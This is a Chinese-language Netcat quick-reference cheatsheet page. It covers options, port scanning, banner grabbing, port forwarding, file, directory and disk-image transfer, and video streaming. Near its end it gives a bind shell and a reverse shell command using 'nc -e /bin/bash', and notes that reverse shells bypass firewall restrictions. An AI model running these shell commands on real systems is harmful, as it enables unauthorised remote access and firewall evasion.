<!doctype html>
<html lang="en" data-color-mode="dark">
<head>
<meta charset="utf-8">
<title>Netcat 备忘清单
 &#x26;  netcat cheatsheet &#x26;  Quick Reference</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta description="Netcat 备忘清单
===

该备忘单提供了在 Linux 和 Unix 上使用 Netcat 的各种方法。

入门，为开发人员分享快速参考备忘单。">
<meta keywords="netcat,reference,Quick,Reference,cheatsheet,cheat,sheet">
<link rel="icon" href="data:image/svg+xml,%3Csvg%20viewBox%3D%220%200%2024%2024%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20height%3D%221em%22%20width%3D%221em%22%3E%20%3Cpath%20d%3D%22m21.66%2010.44-.98%204.18c-.84%203.61-2.5%205.07-5.62%204.77-.5-.04-1.04-.13-1.62-.27l-1.68-.4c-4.17-.99-5.46-3.05-4.48-7.23l.98-4.19c.2-.85.44-1.59.74-2.2%201.17-2.42%203.16-3.07%206.5-2.28l1.67.39c4.19.98%205.47%203.05%204.49%207.23Z%22%20fill%3D%22%23c9d1d9%22%2F%3E%20%3Cpath%20d%3D%22M15.06%2019.39c-.62.42-1.4.77-2.35%201.08l-1.58.52c-3.97%201.28-6.06.21-7.35-3.76L2.5%2013.28c-1.28-3.97-.22-6.07%203.75-7.35l1.58-.52c.41-.13.8-.24%201.17-.31-.3.61-.54%201.35-.74%202.2l-.98%204.19c-.98%204.18.31%206.24%204.48%207.23l1.68.4c.58.14%201.12.23%201.62.27Zm2.43-8.88c-.06%200-.12-.01-.19-.02l-4.85-1.23a.75.75%200%200%201%20.37-1.45l4.85%201.23a.748.748%200%200%201-.18%201.47Z%22%20fill%3D%22%23228e6c%22%20%2F%3E%20%3Cpath%20d%3D%22M14.56%2013.89c-.06%200-.12-.01-.19-.02l-2.91-.74a.75.75%200%200%201%20.37-1.45l2.91.74c.4.1.64.51.54.91-.08.34-.38.56-.72.56Z%22%20fill%3D%22%23228e6c%22%20%2F%3E%20%3C%2Fsvg%3E" type="image/svg+xml">
<link rel="stylesheet" href="..\style\style.css">
<link rel="stylesheet" href="..\style\katex.css">
</head>
<body><nav class="header-nav"><div class="max-container"><a href="..\index.html" class="logo"><svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" height="1em" width="1em">
  <path d="m21.66 10.44-.98 4.18c-.84 3.61-2.5 5.07-5.62 4.77-.5-.04-1.04-.13-1.62-.27l-1.68-.4c-4.17-.99-5.46-3.05-4.48-7.23l.98-4.19c.2-.85.44-1.59.74-2.2 1.17-2.42 3.16-3.07 6.5-2.28l1.67.39c4.19.98 5.47 3.05 4.49 7.23Z" fill="#c9d1d9"></path>
  <path d="M15.06 19.39c-.62.42-1.4.77-2.35 1.08l-1.58.52c-3.97 1.28-6.06.21-7.35-3.76L2.5 13.28c-1.28-3.97-.22-6.07 3.75-7.35l1.58-.52c.41-.13.8-.24 1.17-.31-.3.61-.54 1.35-.74 2.2l-.98 4.19c-.98 4.18.31 6.24 4.48 7.23l1.68.4c.58.14 1.12.23 1.62.27Zm2.43-8.88c-.06 0-.12-.01-.19-.02l-4.85-1.23a.75.75 0 0 1 .37-1.45l4.85 1.23a.748.748 0 0 1-.18 1.47Z" fill="#228e6c"></path>
  <path d="M14.56 13.89c-.06 0-.12-.01-.19-.02l-2.91-.74a.75.75 0 0 1 .37-1.45l2.91.74c.4.1.64.51.54.91-.08.34-.38.56-.72.56Z" fill="#228e6c"></path>
</svg>
<span class="title">Quick Reference</span></a><div class="menu"><a href="javascript:void(0);" class="searchbtn" id="searchbtn"><svg xmlns="http://www.w3.org/2000/svg" height="1em" width="1em" viewBox="0 0 18 18">
  <path fill="currentColor" d="M17.71,16.29 L14.31,12.9 C15.4069846,11.5024547 16.0022094,9.77665502 16,8 C16,3.581722 12.418278,0 8,0 C3.581722,0 0,3.581722 0,8 C0,12.418278 3.581722,16 8,16 C9.77665502,16.0022094 11.5024547,15.4069846 12.9,14.31 L16.29,17.71 C16.4777666,17.8993127 16.7333625,18.0057983 17,18.0057983 C17.2666375,18.0057983 17.5222334,17.8993127 17.71,17.71 C17.8993127,17.5222334 18.0057983,17.2666375 18.0057983,17 C18.0057983,16.7333625 17.8993127,16.4777666 17.71,16.29 Z M2,8 C2,4.6862915 4.6862915,2 8,2 C11.3137085,2 14,4.6862915 14,8 C14,11.3137085 11.3137085,14 8,14 C4.6862915,14 2,11.3137085 2,8 Z"></path>
</svg><span>搜索</span><span>⌘K</span></a><a href="https://github.com/jaywcjlove/reference/blob/main/docs/netcat.md" class="" target="__blank"><svg viewBox="0 0 36 36" fill="currentColor" height="1em" width="1em"><path d="m33 6.4-3.7-3.7a1.71 1.71 0 0 0-2.36 0L23.65 6H6a2 2 0 0 0-2 2v22a2 2 0 0 0 2 2h22a2 2 0 0 0 2-2V11.76l3-3a1.67 1.67 0 0 0 0-2.36ZM18.83 20.13l-4.19.93 1-4.15 9.55-9.57 3.23 3.23ZM29.5 9.43 26.27 6.2l1.85-1.85 3.23 3.23Z"></path><path fill="none" d="M0 0h36v36H0z"></path></svg><span>编辑</span></a><button id="darkMode" type="button"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="currentColor" class="light" height="1em" width="1em">
  <path d="M6.995 12c0 2.761 2.246 5.007 5.007 5.007s5.007-2.246 5.007-5.007-2.246-5.007-5.007-5.007S6.995 9.239 6.995 12zM11 19h2v3h-2zm0-17h2v3h-2zm-9 9h3v2H2zm17 0h3v2h-3zM5.637 19.778l-1.414-1.414 2.121-2.121 1.414 1.414zM16.242 6.344l2.122-2.122 1.414 1.414-2.122 2.122zM6.344 7.759 4.223 5.637l1.415-1.414 2.12 2.122zm13.434 10.605-1.414 1.414-2.122-2.122 1.414-1.414z"></path>
</svg>
<svg xmlns="http://www.w3.org/2000/svg" fill="currentColor" viewBox="0 0 24 24" class="dark" height="1em" width="1em">
  <path d="M12 11.807A9.002 9.002 0 0 1 10.049 2a9.942 9.942 0 0 0-5.12 2.735c-3.905 3.905-3.905 10.237 0 14.142 3.906 3.906 10.237 3.905 14.143 0a9.946 9.946 0 0 0 2.735-5.119A9.003 9.003 0 0 1 12 11.807z"></path>
</svg>
</button><script src="../js/dark.js?v=1.5.3"></script><a href="https://github.com/jaywcjlove/reference" class="" target="__blank"><svg viewBox="0 0 16 16" fill="currentColor" height="1em" width="1em"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.012 8.012 0 0 0 16 8c0-4.42-3.58-8-8-8z"></path></svg></a></div></div></nav><div class="wrap h1body-exist max-container"><header class="wrap-header h1wrap"><h1 id="netcat-备忘清单"><svg xmlns="http://www.w3.org/2000/svg" height="1em" width="1em" viewBox="0 0 30 27">
<path fill="currentColor" fill-rule="evenodd" d="M24.1575957,7.91399838 C19.6909292,2.9579985 10.7162627,2.9579985 6.2509295,7.91399838 C4.72692954,9.60599833 4.04826289,11.7206649 4.28826288,14.0313316 C4.61226288,17.1499981 5.87759618,19.8033314 7.83359613,21.6193314 C7.8642628,21.0966647 7.86159613,20.4646647 7.78559613,19.6833314 L7.46692947,16.4099982 L10.3602627,17.9726648 C13.4069293,19.6179981 17.0002626,19.6179981 20.0455958,17.9726648 L22.9389291,16.4099982 L22.6215958,19.6833314 C22.5442624,20.4646647 22.5429291,21.0966647 22.5735958,21.6193314 C24.5295957,19.8033314 25.794929,17.1499981 26.118929,14.0313316 C26.358929,11.7206649 25.682929,9.60599833 24.1575957,7.91399838 M29.6015956,14.3926649 C29.0642623,19.5833314 26.430929,23.8366646 22.3789291,26.0646646 L21.1455958,26.7433312 L20.2189292,25.6833313 C20.1015958,25.5486646 19.2989292,24.5486646 19.0975958,22.153998 C16.7162626,22.8913313 13.6909293,22.8913313 11.3109294,22.153998 C11.109596,24.5486646 10.3069294,25.5486646 10.1895961,25.6833313 L9.26159609,26.7433312 L8.02826279,26.0646646 C3.97626289,23.837998 1.34426296,19.5833314 0.805596305,14.3926649 C0.46426298,11.1153316 1.47492962,7.98333171 3.64959623,5.56999844 C9.51359609,-0.934001402 20.8949291,-0.934001402 26.7575957,5.56999844 C28.9335956,7.98333171 29.9429289,11.1153316 29.6015956,14.3926649" transform="matrix(1 0 0 -1 0 27.435)"></path>
</svg><a aria-hidden="true" tabindex="-1" href="#netcat-备忘清单"><span class="icon icon-link"></span></a>Netcat 备忘清单</h1><div class="wrap-body">
<p>该备忘单提供了在 Linux 和 Unix 上使用 Netcat 的各种方法。</p>
</div></header><div class="menu-tocs"><div class="menu-btn"><svg aria-hidden="true" fill="currentColor" height="1em" width="1em" viewBox="0 0 16 16" version="1.1" data-view-component="true">
  <path fill-rule="evenodd" d="M2 4a1 1 0 100-2 1 1 0 000 2zm3.75-1.5a.75.75 0 000 1.5h8.5a.75.75 0 000-1.5h-8.5zm0 5a.75.75 0 000 1.5h8.5a.75.75 0 000-1.5h-8.5zm0 5a.75.75 0 000 1.5h8.5a.75.75 0 000-1.5h-8.5zM3 8a1 1 0 11-2 0 1 1 0 012 0zm-1 6a1 1 0 100-2 1 1 0 000 2z"></path>
</svg></div><div class="menu-modal"><a aria-hidden="true" class="leve2 tocs-link" data-num="2" href="#入门">入门</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#用法">用法</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#选项示例">选项示例</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#聊天客户端-服务器">聊天客户端-服务器</a><a aria-hidden="true" class="leve2 tocs-link" data-num="2" href="#netcat-示例">Netcat 示例</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#banner-抓取">Banner 抓取</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#端口扫描">端口扫描</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#代理和端口转发">代理和端口转发</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#下载文件">下载文件</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#上传文件">上传文件</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#目录传输">目录传输</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#加密传输">加密传输</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#克隆">克隆</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#视频流">视频流</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#远程-shell">远程 shell</a><a aria-hidden="true" class="leve3 tocs-link" data-num="3" href="#逆转-shell">逆转 shell</a></div></div><div class="h1wrap-body"><div class="wrap h2body-exist"><div class="wrap-header h2wrap"><h2 id="入门"><a aria-hidden="true" tabindex="-1" href="#入门"><span class="icon icon-link"></span></a>入门</h2><div class="wrap-body">
<!--rehype:body-class=cols-5-->
</div></div><div class="h2wrap-body cols-5"><div class="wrap h3body-not-exist col-span-2"><div class="wrap-header h3wrap"><h3 id="用法"><a aria-hidden="true" tabindex="-1" href="#用法"><span class="icon icon-link"></span></a>用法</h3><div class="wrap-body">
<!--rehype:wrap-class=col-span-2-->
<p>连接到位于任何地方的主机</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token punctuation">[</span>options<span class="token punctuation">]</span> <span class="token punctuation">[</span>host<span class="token punctuation">]</span> <span class="token punctuation">[</span>port<span class="token punctuation">]</span>
</span></code></pre>
<p>监听传入连接</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-lp</span> port <span class="token punctuation">[</span>host<span class="token punctuation">]</span> <span class="token punctuation">[</span>port<span class="token punctuation">]</span>
</span></code></pre>
</div></div></div><div class="wrap h3body-not-exist col-span-3 row-span-2"><div class="wrap-header h3wrap"><h3 id="选项示例"><a aria-hidden="true" tabindex="-1" href="#选项示例"><span class="icon icon-link"></span></a>选项示例</h3><div class="wrap-body">
<!--rehype:wrap-class=col-span-3 row-span-2-->

































































<table><thead><tr><th align="left">选项</th><th align="left">示例</th><th align="left">说明</th></tr></thead><tbody><tr><td align="left"><code>-h</code></td><td align="left">nc -h</td><td align="left">帮助</td></tr><tr><td align="left"><code>-z</code></td><td align="left">nc -z 192.168.1.9 1-100</td><td align="left">端口扫描主机或 <code>IP</code> 地址</td></tr><tr><td align="left"><code>-v</code></td><td align="left">nc -zv 192.168.1.9 1-100</td><td align="left">提供详细输出</td></tr><tr><td align="left"><code>-n</code></td><td align="left">nc -zn 192.168.1.9 1-100</td><td align="left">通过禁用 <code>DNS</code> 解析进行快速扫描</td></tr><tr><td align="left"><code>-l</code></td><td align="left">nc -lp 8000</td><td align="left"><code>TCP</code> 侦听模式 <em>(用于入站连接)</em></td></tr><tr><td align="left"><code>-w</code></td><td align="left">nc -w 180 192.168.1.9 8000</td><td align="left">定义超时值</td></tr><tr><td align="left"><code>-k</code></td><td align="left">nc -kl 8000</td><td align="left">断线后继续收听</td></tr><tr><td align="left"><code>-u</code></td><td align="left">nc -u 192.168.1.9 8000</td><td align="left">使用 <code>UDP</code> 而不是 <code>TCP</code></td></tr><tr><td align="left"><code>-q</code></td><td align="left">nc -q 1 192.168.1.9 8000</td><td align="left">客户在 <code>EOF</code> 后熬夜</td></tr><tr><td align="left"><code>-4</code></td><td align="left">nc -4 -l 8000</td><td align="left">仅限 <code>IPv4</code></td></tr><tr><td align="left"><code>-6</code></td><td align="left">nc -6 -l 8000</td><td align="left">仅限 <code>IPv6</code></td></tr></tbody></table>
</div></div></div><div class="wrap h3body-not-exist col-span-2"><div class="wrap-header h3wrap"><h3 id="聊天客户端-服务器"><a aria-hidden="true" tabindex="-1" href="#聊天客户端-服务器"><span class="icon icon-link"></span></a>聊天客户端-服务器</h3><div class="wrap-body">
<!--rehype:wrap-class=col-span-2-->
<p>服务器 Server (192.168.1.9)</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-lv</span> <span class="token number">8000</span>
</span></code></pre>
<p>客户端 Client</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token number">192.168</span>.1.9 <span class="token number">8000</span>
</span></code></pre>
</div></div></div></div></div><div class="wrap h2body-exist"><div class="wrap-header h2wrap"><h2 id="netcat-示例"><a aria-hidden="true" tabindex="-1" href="#netcat-示例"><span class="icon icon-link"></span></a>Netcat 示例</h2><div class="wrap-body">
</div></div><div class="h2wrap-body"><div class="wrap h3body-not-exist"><div class="wrap-header h3wrap"><h3 id="banner-抓取"><a aria-hidden="true" tabindex="-1" href="#banner-抓取"><span class="icon icon-link"></span></a>Banner 抓取</h3><div class="wrap-body">
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> website.com <span class="token number">80</span>
</span><span class="code-line">GET index.html HTTP/1.1
</span><span class="code-line">HEAD / HTTP/1.1
</span></code></pre>
<p>或者</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line"><span class="token builtin class-name">echo</span> <span class="token string">""</span> <span class="token operator">|</span> <span class="token function">nc</span> <span class="token parameter variable">-zv</span> <span class="token parameter variable">-wl</span> <span class="token number">192.168</span>.1.1 <span class="token number">801</span>-805
</span></code></pre>
</div></div></div><div class="wrap h3body-not-exist"><div class="wrap-header h3wrap"><h3 id="端口扫描"><a aria-hidden="true" tabindex="-1" href="#端口扫描"><span class="icon icon-link"></span></a>端口扫描</h3><div class="wrap-body">
<p>扫描 <code>21</code> 到 <code>25</code> 之间的端口</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-zvn</span> <span class="token number">192.168</span>.1.1 <span class="token number">21</span>-25
</span></code></pre>
<p>扫描端口 <code>22</code>、<code>3306</code> 和 <code>8080</code></p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-zvn</span> <span class="token number">192.168</span>.1.1 <span class="token number">22</span> <span class="token number">3306</span> <span class="token number">8080</span>
</span></code></pre>
</div></div></div><div class="wrap h3body-not-exist"><div class="wrap-header h3wrap"><h3 id="代理和端口转发"><a aria-hidden="true" tabindex="-1" href="#代理和端口转发"><span class="icon icon-link"></span></a>代理和端口转发</h3><div class="wrap-body">
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-lp</span> <span class="token number">8001</span> <span class="token parameter variable">-c</span> <span class="token string">"nc 127.0.0.1 8000"</span>
</span></code></pre>
<p>或者</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-l</span> <span class="token number">8001</span> <span class="token operator">|</span> <span class="token function">nc</span> <span class="token number">127.0</span>.0.1 <span class="token number">8000</span>
</span></code></pre>
<p>创建从一个本地端口到另一个本地端口的隧道</p>
</div></div></div><div class="wrap h3body-not-exist"><div class="wrap-header h3wrap"><h3 id="下载文件"><a aria-hidden="true" tabindex="-1" href="#下载文件"><span class="icon icon-link"></span></a>下载文件</h3><div class="wrap-body">
<p>服务器 Server (192.168.1.9)</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-lv</span> <span class="token number">8000</span> <span class="token operator">&#x3C;</span> file.txt
</span></code></pre>
<p>客户端 Client</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-nv</span> <span class="token number">192.168</span>.1.9 <span class="token number">8000</span> <span class="token operator">></span> file.txt
</span></code></pre>
<p>假设您想将文件 <code>file.txt</code> 从服务器 A 传输到客户端 B。</p>
</div></div></div><div class="wrap h3body-not-exist"><div class="wrap-header h3wrap"><h3 id="上传文件"><a aria-hidden="true" tabindex="-1" href="#上传文件"><span class="icon icon-link"></span></a>上传文件</h3><div class="wrap-body">
<p>服务器 Server (192.168.1.9)</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-lv</span> <span class="token number">8000</span> <span class="token operator">></span> file.txt
</span></code></pre>
<p>客户端 Client</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token number">192.168</span>.1.9 <span class="token number">8000</span> <span class="token operator">&#x3C;</span> file.txt
</span></code></pre>
<p>假设您想将文件 <code>file.txt</code> 从客户端 <code>B</code> 传输到服务器 <code>A</code></p>
</div></div></div><div class="wrap h3body-not-exist"><div class="wrap-header h3wrap"><h3 id="目录传输"><a aria-hidden="true" tabindex="-1" href="#目录传输"><span class="icon icon-link"></span></a>目录传输</h3><div class="wrap-body">
<p>服务器 Server (192.168.1.9)</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">tar</span> <span class="token parameter variable">-cvf</span> – dir_name <span class="token operator">|</span> <span class="token function">nc</span> <span class="token parameter variable">-l</span> <span class="token number">8000</span>
</span></code></pre>
<p>客户端 Client</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-n</span> <span class="token number">192.168</span>.1.9 <span class="token number">8000</span> <span class="token operator">|</span> <span class="token function">tar</span> <span class="token parameter variable">-xvf</span> -
</span></code></pre>
<p>假设您想通过网络将目录从 <code>A</code> 传输到 <code>B</code></p>
</div></div></div><div class="wrap h3body-not-exist col-span-2"><div class="wrap-header h3wrap"><h3 id="加密传输"><a aria-hidden="true" tabindex="-1" href="#加密传输"><span class="icon icon-link"></span></a>加密传输</h3><div class="wrap-body">
<!--rehype:wrap-class=col-span-2-->
<p>服务器 Server (192.168.1.9)</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-l</span> <span class="token number">8000</span> <span class="token operator">|</span> openssl enc <span class="token parameter variable">-d</span> <span class="token parameter variable">-des3</span> <span class="token parameter variable">-pass</span> pass:password <span class="token operator">></span> file.txt
</span></code></pre>
<p>客户端 Client</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ openssl enc <span class="token parameter variable">-des3</span> <span class="token parameter variable">-pass</span> pass:password <span class="token operator">|</span> <span class="token function">nc</span> <span class="token number">192.168</span>.1.9 <span class="token number">8000</span>
</span></code></pre>
<p>在通过网络传输之前加密数据</p>
</div></div></div><div class="wrap h3body-not-exist"><div class="wrap-header h3wrap"><h3 id="克隆"><a aria-hidden="true" tabindex="-1" href="#克隆"><span class="icon icon-link"></span></a>克隆</h3><div class="wrap-body">
<p>服务器 Server (192.168.1.9)</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">dd</span> <span class="token assign-left variable">if</span><span class="token operator">=</span>/dev/sda <span class="token operator">|</span> <span class="token function">nc</span> <span class="token parameter variable">-l</span> <span class="token number">8000</span>
</span></code></pre>
<p>客户端 Client</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-n</span> <span class="token number">192.168</span>.1.9 <span class="token number">8000</span> <span class="token operator">|</span> <span class="token function">dd</span> <span class="token assign-left variable">of</span><span class="token operator">=</span>/dev/sda
</span></code></pre>
<p>克隆 linux PC 非常简单。假设你的系统盘是 /dev/sda</p>
</div></div></div><div class="wrap h3body-not-exist"><div class="wrap-header h3wrap"><h3 id="视频流"><a aria-hidden="true" tabindex="-1" href="#视频流"><span class="icon icon-link"></span></a>视频流</h3><div class="wrap-body">
<p>服务器 Server (192.168.1.9)</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">cat</span> video.avi <span class="token operator">|</span> <span class="token function">nc</span> <span class="token parameter variable">-l</span> <span class="token number">8000</span>
</span></code></pre>
<p>客户端 Client</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token number">192.168</span>.1.9 <span class="token number">8000</span> <span class="token operator">|</span> mplayer <span class="token parameter variable">-vo</span> x11 <span class="token parameter variable">-cache</span> <span class="token number">3000</span> -
</span></code></pre>
<p>使用 netcat 流式传输视频</p>
</div></div></div><div class="wrap h3body-not-exist"><div class="wrap-header h3wrap"><h3 id="远程-shell"><a aria-hidden="true" tabindex="-1" href="#远程-shell"><span class="icon icon-link"></span></a>远程 shell</h3><div class="wrap-body">
<p>服务器 Server (192.168.1.9)</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-lv</span> <span class="token number">8000</span> <span class="token parameter variable">-e</span> /bin/bash
</span></code></pre>
<p>客户端 Client</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token number">192.168</span>.1.9 <span class="token number">8000</span>
</span></code></pre>
<p>我们已经使用 <code>telnet</code> 和 <code>ssh</code> 使用远程 <code>Shell</code>，但是如果它们没有安装并且我们没有安装它们的权限，那么我们也可以使用 <code>netcat</code> 创建远程 <code>shell</code></p>
</div></div></div><div class="wrap h3body-not-exist"><div class="wrap-header h3wrap"><h3 id="逆转-shell"><a aria-hidden="true" tabindex="-1" href="#逆转-shell"><span class="icon icon-link"></span></a>逆转 shell</h3><div class="wrap-body">
<p>服务器 Server (192.168.1.9)</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token parameter variable">-lv</span> <span class="token number">8000</span>
</span></code></pre>
<p>客户端 Client</p>
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token number">192.168</span>.1.9 <span class="token number">8000</span> <span class="token parameter variable">-v</span> <span class="token parameter variable">-e</span> /bin/bash
</span></code></pre>
<p>反向 <code>shell</code> 通常用于绕过防火墙限制，例如阻止入站连接</p>
</div></div></div></div></div></div><script src="https://giscus.app/client.js" data-repo="jaywcjlove/reference" data-repo-id="R_kgDOID2-Mw" data-category="Q&#x26;A" data-category-id="DIC_kwDOID2-M84CS5wo" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="dark" data-lang="zh-CN" crossorigin="anonymous" async></script><div class="giscus"></div></div><footer class="footer-wrap"><footer class="max-container">© 2022 <a href="https://wangchujiang.com/#/app" target="_blank">Kenny Wang</a>.</footer></footer><script src="..\/data.js?v=1.5.3" defer></script><script src="..\/js/fuse.min.js?v=1.5.3" defer></script><script src="..\/js/main.js?v=1.5.3" defer></script><div id="mysearch"><div class="mysearch-box"><div class="mysearch-input"><div><svg xmlns="http://www.w3.org/2000/svg" height="1em" width="1em" viewBox="0 0 18 18">
  <path fill="currentColor" d="M17.71,16.29 L14.31,12.9 C15.4069846,11.5024547 16.0022094,9.77665502 16,8 C16,3.581722 12.418278,0 8,0 C3.581722,0 0,3.581722 0,8 C0,12.418278 3.581722,16 8,16 C9.77665502,16.0022094 11.5024547,15.4069846 12.9,14.31 L16.29,17.71 C16.4777666,17.8993127 16.7333625,18.0057983 17,18.0057983 C17.2666375,18.0057983 17.5222334,17.8993127 17.71,17.71 C17.8993127,17.5222334 18.0057983,17.2666375 18.0057983,17 C18.0057983,16.7333625 17.8993127,16.4777666 17.71,16.29 Z M2,8 C2,4.6862915 4.6862915,2 8,2 C11.3137085,2 14,4.6862915 14,8 C14,11.3137085 11.3137085,14 8,14 C4.6862915,14 2,11.3137085 2,8 Z"></path>
</svg><input id="mysearch-input" type="search" placeholder="搜索" autocomplete="off"><div class="mysearch-clear"></div></div><button id="mysearch-close" type="button">搜索</button></div><div class="mysearch-result"><div id="mysearch-menu"></div><div id="mysearch-content"></div></div></div></div></body>
</html>
